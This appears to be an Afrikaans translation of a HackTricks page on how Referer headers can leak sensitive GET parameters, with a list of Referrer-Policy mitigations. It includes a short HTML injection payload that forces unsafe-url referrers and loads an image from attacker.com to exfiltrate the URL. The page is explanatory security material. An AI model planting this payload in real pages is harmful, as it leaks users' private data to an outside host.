2.4 KiB
{% hint style="success" %}
Leer en oefen AWS-hacking: 
HackTricks Opleiding AWS Red Team Expert (ARTE)
Leer en oefen GCP-hacking: 
HackTricks Opleiding GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Controleer die inskrywingsplanne!
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking-truuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.
Verwysingskoppe en beleid
Verwysing is die kop wat deur webblaaie gebruik word om aan te dui watter die vorige bladsy was wat besoek is.
Sensitiewe inligting wat uitgelek is
Indien op enige oomblik binne 'n webbladsy enige sensitiewe inligting op 'n GET-versoekparameters geleë is, as die bladsy skakels na eksterne bronne bevat of 'n aanvaller in staat is om die gebruiker te laat 'n URL besoek wat deur die aanvaller beheer word. Dit kan in staat wees om die sensitiewe inligting binne die laaste GET-versoek uit te skakel.
Versagting
Jy kan die blaaier laat 'n Verwysingsbeleid volg wat die sensitiewe inligting kan vermy om na ander webtoepassings gestuur te word:
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
Teenmaatreël
Jy kan hierdie reël oorskryf deur 'n HTML meta-tag te gebruik (die aanvaller moet 'n HTML-inspuiting uitbuit):
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
Verdediging
Moenie enige sensitiewe data binne GET parameters of paaie in die URL plaas nie.